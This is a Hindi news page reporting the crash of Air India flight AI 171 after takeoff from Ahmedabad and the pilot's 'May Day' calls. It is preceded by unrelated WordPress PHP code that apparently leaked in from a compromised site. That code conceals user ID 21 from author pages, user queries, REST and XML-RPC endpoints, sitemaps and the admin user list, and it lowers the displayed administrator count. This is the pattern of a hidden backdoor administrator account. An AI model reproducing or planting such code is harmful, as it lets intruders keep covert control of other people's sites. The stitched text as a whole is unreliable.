add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
एयर इंडिया के पायलट ने आपातकालीन स्थिति में तीन बार 'May Day' संदेश भेजा - Press Ki Taquat
No Result
View All Result
एयर इंडिया का विमान एआई 171 आज दोपहर को एक गंभीर दुर्घटना का शिकार हो गया। यह विमान अहमदाबाद से लंदन के लिए उड़ान भर रहा था और इसमें कुल 242 लोग सवार थे, जिनमें 230 यात्री, 2 पायलट और 10 क्रू सदस्य शामिल थे। यात्रियों में 169 भारतीय, 53 ब्रिटिश, 1 कनाडाई और 7 पुर्तगाली नागरिक थे। विमान ने टेकऑफ के केवल पांच मिनट बाद ही दुर्घटनाग्रस्त होने की सूचना दी। प्रारंभिक जानकारी के अनुसार, टेकऑफ के तुरंत बाद पायलट ने अपने निकटतम एयर ट्रैफिक कंट्रोल को खतरे का संकेत भेजा, जिसमें उन्होंने तीन बार “May Day, May Day, May Day” का संदेश भेजा। इस संदेश के कुछ ही मिनटों बाद विमान का संपर्क टूट गया और वह दुर्घटनाग्रस्त हो गया। एयर ट्रैफिक कंट्रोल के अनुसार, विमान ने अहमदाबाद के रनवे 23 से 1339 IST (0809 UTC) पर उड़ान भरी थी। इस घटना ने सभी को चौंका दिया है और इसकी जांच की जा रही है।
Post Views: 562
No Result
View All Result